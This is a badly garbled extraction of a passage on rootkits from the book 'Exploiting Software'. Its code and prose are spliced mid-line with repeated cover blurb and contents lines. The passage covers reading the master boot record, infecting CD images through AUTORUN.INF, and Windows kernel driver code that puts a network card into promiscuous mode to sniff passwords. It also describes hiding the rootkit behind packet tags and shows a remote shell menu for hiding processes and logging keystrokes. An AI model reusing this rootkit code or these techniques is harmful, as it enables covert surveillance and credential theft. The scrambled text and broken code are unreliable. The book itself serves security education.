Another traditional method of storing viruses has been on boot blocks, floppy disks, and hard drives. Interestingly enough, these techniques still work today and it's quite simple to access the boot block of a drive. The following code illustrates a simple method to read and write
• Table of Contents
from the master boot record on an NT system.
•Index
Exploiting Software How to Break Code
Reading/WritingByGreg Hoglund,Gary McGrawthe Master Boot Record (MBR)
Publisher: Addison Wesley
To obtain access to the MBR you must have raw read/write access to the physical drive itself. UsingPubaDate:simpleFebruarycall17,to 2004CreateFile and the proper object name, you can open any of the drives ISBN:on a 0system-201-78695. The-8following code shows how to open a handle to the first physical drive and subsequentlyPages: 512 read the first 512 bytes of data from it. This block of data contains the contents of the first drive sector, otherwise known as the MBR.
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
char mbr_data[512];
attack, you must first learn how real attacks are really carried out.
DWORD dwBytesRead;
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
HANDLEWhyhDriversoftware= exploitCreateFile("\\\\will continue.to\\physicaldrive0",be a serious problem
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
Infecting CD-ROM Images
CD-ROMs use the ISO9660 file system. These can be infected with virus programs in a similar way that floppy disks can be infected with a virus. A bootable CD can most certainly contain a virus that is activated on boot. Another trick is using the AUTORUN.INF file. The
AUTORUN.INF file causes programs to be launched automatically when the CD is inserted. This feature is often on by default. Lastly, files on the CD can simply be infected using standard tricks. There is nothing stopping a virus or rootkit from accessing a CD-R drive and burning information to a mounted (writable) CD disk.[7]
[7] More on the idea of infecting CD images can be found in the 'zine 29A Labs, issue 6, "Infecting ISO CD Images" by ZOMBiE.
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
Adding Network Support to a Driver
Allowing a rootkit driver to talk to the network adds a final, but critical touch, allowing the code be accessed remotely. It is possible to embed a TCP/IP stack into a driver and open a remote shell. In fact, the popular kernel-mode debugger called SoftIce has this feature. The NTROOT
•
Table of Contents
rootkit distributed from www.rootkit.com has sample code that exposes a TCP/IP shell. Under
•
Index
Windows NT, an easy way to build network support is to use the NDIS library. Unfortunately no
Exploitingmany deviceSoftwaredriverHowbooksto BreakcoverCodethe subject of network device drivers. Thus, use of NDIS has no
been well documented outside the DDK.
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
UsingPub Dathe: FebruaryNDIS17,Library2004
ISBN: 0-201-78695-8
MicrosoftPages:supplies512 the NDIS library for network and protocol drivers to implement their own sta independent of the network card. We can use this library to build a stack and communicate with the network. This is one way that a rootkit driver can provide an interactive shell.
The first step in using NDIS is to register a set of callback functions for NDIS operations. The
OnXXX values are pointers to callback functions.[8]
How does software break? How do attackers make software break on purpose? Why are
firewalls,[8] intrusion detection systems, and antivirus software not keeping out the bad guys?
Complete source for these examples can be obtained from http://www.rootkit.com.
What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING
Why software exploit will continue to be a serious problem
theRegistryPath )
When network security mechanisms do not work
{
Attack patterns
ReverseNDISengineeringPROTOCOL_CHARACTERISTICS
aProtocolChar;
Classic attacks against server software
// DD
UNICODE STRING aDriverName;
Surprising attacks against client software
Techniques for crafting malicious input
/*
The technical details of buffer overflows
* init network sniffer - this is all standard and
Rootkits
* documented in the DDK.
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break software. */
How does software break? How do attackers make software break on purpose? Why are aProtocolChar.Name = aProtoName;
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
DbgPrint("ROOTKIT: Registering NDIS Protocol\n");
techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the
NdisRegisterProtocol( &aStatus,
script kiddie treatment found in many hacking books, you will learn about
&aNdisProtocolHandle,
Why software exploit will continue to be a serious problem
if (ReadRegistry( &aDriverName ) != STATUS_SUCCESS) {
Publisher: Addison Wesley
goto RegistryError;
Pub Date: February 17, 2004
ISBN:} 0-201-78695-8
Pages: 512
...
NdisOpenAdapter(
&aStatus,
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
&aErrorStatus,
What tools can be used to break software? This book provides the answers.
&anOpenP->AdapterHandle,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
&aDeviceExtension->Medium, attack, you must first learn how real attacks are really carried out.
&aMediumArray,
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
1,
Why software exploit willaDeviceExtensioncontinue to be a-serious>NdisProtocolHandle,problem
When network security mechanisms do not work anOpenP,
Attack patterns
&aDeviceExtension->AdapterName,
Reverse engineering
0,
Classic attacks against server software
NULL);
Surprising attacks against client software
if (aStatus != NDIS_STATUS_PENDING)
Techniques for crafting malicious input
{
The technical details of buffer overflows
OnOpenAdapterDone(
Rootkits
anOpenP,
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software. aStatus,
NDIS_STATUS_SUCCESS
);
}
Publisher: Addison Wesley
...
}
•Table of Contents
•Index
ExploitingThe first callSoftwareis toHowNdisRegisterProtocolto Break Code , which is how we register our callback functions. The
second call is to ReadRegistry (explained later), which tells us the binding name for the netwo
ByGreg Hoglund,Gary McGraw
card. This information is used to initialize the device extension structure that is then used in a c toNdisOpenAdapter. If the call returns success, we must manually call OnOpenAdapterDone. If
the call returns NDIS_STATUS_PENDING this means that the OS is going to make a callback to
Pub Date: February 17, 2004
OnOpenAdapterDone on our behalf.
ISBN: 0-201-78695-8
Pages: 512
Putting the Interface in Promiscuous Mode
When a network interface is in "promiscuous mode" it can sniff all packets that are physically
delivered to the interface, regardless of target address. This is required if you want to see traffi How does software break? How do attackers make software break on purpose? Why are
that is destined for other machines on the network. We put the network interface card into firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
promiscuous mode so the rootkit can sniff passwords and other communications channel What tools can be used to break software? This book provides the answers.
information. This is performed in the OnOpenAdapterDone call. We use the NdisRequest functio
to set the interface into promiscuous mode:
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
VOID When network security mechanisms do not work
Attack patterns
OnOpenAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
Reverse engineering
IN NDIS_STATUS Status,
Classic attacks against server software
IN NDIS_STATUS OpenErrorStatus )
Surprising attacks against client software
{
Techniques for crafting malicious input
PIRP Irp = NULL;
The technical details of buffer overflows
POPEN_INSTANCE
Open = NULL;
Rootkits
NDIS_REQUEST anNdisRequest;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
NdisRequest( &anotherStatus,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys togOpenInstancebreak oftware->AdapterHandle,. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
&anNdisRequest
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in);many hacking books, you will learn about
}
Why software exploit will continue to be a serious problem
return;
When network security mechanisms do not work
}
Attack patterns
Reverse engineering
Classic attacks against server software
Finding the Correct Network Card
Surprising attacks against client software
WindowsTechniquesstores informationcr fting aboutmaliciousnetworkinputcards in the following registry key:
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
Under this key are a series of numbered subkeys. Each subkey represents a network card or
interface. The subkey contains a very important value called ServiceName. This value is a strin that contains the GUID, which must be used to open the adapter. The rootkit driver must obtain one of these GUID strings to open a binding to the adapter using NDIS.
The following code snippet obtains this GUID value for the first network interface listed[9]:
[9]Once again, all this code can be obtained from http://www.rootkit.com as part of the NTROOT rootkit driv
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
/* this is major work just to enum a subkey value */
Pages: 512
NTSTATUS
EnumSubkeys(
IN PWSTR theRegistryPath,
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
IN PUNICODE_STRING theStringP
What tools can be used to break software? This book provides the answers.
)Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from
{attack, you must first learn how real attacks are really carried out.
This must//----------------------------------------------------have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
// for opening parent key
Why software exploit will continue to be a serious problem
HANDLE hKey;
When network security mechanisms do not work
OBJECT_ATTRIBUTES oa;
Attack patterns
NTSTATUS Status;
Reverse engineering
UNICODE_STRING ParentPath;
Classic attacks against server software
Surprising attacks against client software
// for enumerating a subkey
Techniques for crafting malicious input
KEY_BASIC_INFORMATION Info;
The technical details of buffer overflows
PKEY_BASIC_INFORMATION pInfo;
Rootkits
ULONG ResultLength;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems,&ParentPath,and an ivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
OBJ_CASE_INSENSITIVE,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
NULL,
attack, you must first learn how real attacks are really carried out.
(PSECURITY_DESCRIPTOR)NULL);
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
Status = ZwOpenKey(&hKey,
KEY_READ,
Why software exploit will continue to be a serious problem
&oa);
When network security mechanisms do not work
Attack patterns
ifReverse(!NT_engineeringSUCCESS(Status)) {
ClassicreturnattacksStatus;gainst server software
}Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
/*
Rootkits
**First find the length of the subkey data.
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
*/
software.
Status = ZwEnumerateKey(hKey,
0, /* index of zero */
KeyBasicInformation,
&Info,
sizeof(Info),
&ResultLength);
if (Status == STATUS_NO_MORE_ENTRIES || NT_ERROR(Status)) {
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers. if (pInfo == NULL) {
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
Status = STATUS_INSUFFICIENT_RESOURCES;
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out. return Status;
This must-have book may shock you—and it will certainly educate you.Getting beyond the
}
script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
/*
When network security mechanisms do not work
**Now enumerate the first subkey.
Attack patterns
*/
Reverse engineering
Status = ZwEnumerateKey(hKey,
Classic attacks against server software
0,
Surprising attacks against client software
KeyBasicInformation,
Techniques for crafting malicious input
pInfo,
The technical details of buffer overflows
Rootkits
Size,
Exploiting Softwareis filled with&ResultLength);the tools, concepts, and knowledge necessary to break
software.
if (!NT_SUCCESS(Status)) {
ExFreePool((PVOID)pInfo);
return Status;
}
if (Size != ResultLength) {
ExFreePool((PVOID)pInfo);
Status = STATUS_INTERNAL_ERROR;
•
returnTable ofStatus;Contents
• Index
}
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
/*
Pub Date: February 17, 2004
**ISBN:Generate0-201-78695the-8fully expanded name and query values.
Pages: 512
*/
FullName = ExAllocatePool(PagedPool,
ParentPath.Length +
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
sizeof(WCHAR) + // '\'
What tools can be used to break software? This book provides the answers.
pInfo->NameLength + sizeof(UNICODE_NULL));
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
if (FullName == NULL) {
attack, you must first learn how real attacks are really carried out.
ExFreePool((PVOID)pInfo);
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about return STATUS_INSUFFICIENT_RESOURCES;
}Why software exploit will continue to be a serious problem
When network security mechanisms do not work
RtlCopyMemory((PVOID)FullName,
Attack patterns (PVOID)ParentPath.Buffer,
Reverse engineering
ParentPath.Length);
Classic attacks against server software
Position = FullName + ParentPath.Length / sizeof(WCHAR);
Surprising attacks against client software
Position[0] = '\\';
Techniques for crafting malicious input
Position++;
The technical details of buffer overflows
RtlCopyMemory((PVOID)Position,
Rootkits
(PVOID)pInfo->Name,
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
How does software break? How do attackers make software break on purpose? Why are
aParamTable[0].Name = L"ServiceName";
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers. aParamTable[0].EntryContext = theStringP; /* will be allocated */
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
// Because we are using required and direct,
This must-have book may shock you—and it will certainly educate you.Getting beyond the script//kiddiewe don'ttreatmneednt foundto setin manydefaultshacking. books, you will learn about
// IMPORTANT note, the last entry is ALL NULL,
Why software exploit will continue to be a serious problem
// required by call to know when it's done. Don't forget!
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
NTSTATUS ReadRegistry( IN PUNICODE_STRING theBindingName ) {
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
NTSTATUS aStatus;
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
UNICODE_STRING aString;
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
DbgPrint("ROOTKIT: ReadRegistry called\n");
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
__try
Attack patterns
{
Reverse engineering
aString.Length = 0;
Classic attacks against server software
aString.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH ); /* free me *
How does software break? How do attackers make software break on purpose? Why are
__except(EXCEPTION_EXECUTE_HANDLER)
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
{
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
DbgPrint("rootkit: Exception occurred in ReadRegistry(). Unknown error. \n techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
}
This must-have book may shock you—and it will certainly educate you.Getting beyond the return STATUS_UNSUCCESSFUL;
script kiddie treatment found in many hacking books, you will learn about
}
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Usingboron Tags for Security
Reverse engineering
One nice trick to use to prevent people from detecting the rootkit network interface is to require
Classic attacks against server software
certain source port or IP ID value before the rootkit will respond to a packet. This idea can be
extended to any data in the packet, but the key is that some obscure knowledge is required bef
Surprising attacks against client software
the rootkit will respond. Remember that a rootkit can be compiled and customized by anyone,
thus the choice of obfuscation is left up to your imagination. Techniques for crafting malicious input
The technical details of buffer overflows
Adding an Interactive Shell
Rootkits
A rootkit can have a remote TCP/IP shell directly into the kernel. Here is an example from of the Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break menu provided by one of the rootkits at www.rootkit.com:
software.
Win2K Rootkit by the team rootkit.com
Version 0.4 alpha
------------------------------------------
command description
•Table of Contents
ps
show proclist
•Index
Exploiting Software How to Break Code
help
this data
ByGreg Hoglund,Gary McGraw
buffertest
debug output
Publisher: Addison Wesley
hidedirPub Date: February 17,hide2004 prefixed file/dir
ISBN: 0-201-78695-8
hideprocPages: 512
hide prefixed processes
debugint
(BSOD)fire int3
sniffkeys
toggle keyboard sniffer
How does software break? How do attackers make software break on purpose? Why are
echo <string>
echo the given string
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
*(BSOD) means Blue Screen of Death
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and if a kernel debugger is not present!
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
*'prefixed' means the process or filename
This must-have book may shock you—and it will certainly educate you.Getting beyond the starts with the letters '_root_'.
script kiddie treatment found in many hacking books, you will learn about
;
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
Surprising attacks against client software
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
Rootkits
Why software exploit will
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
The technical details of buffer overflows
Rootkits
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
Attack patterns
if
Classic
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Surprising attacksFullName,against client software
Techniques for crafting&aParamTable[0],malicious input
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits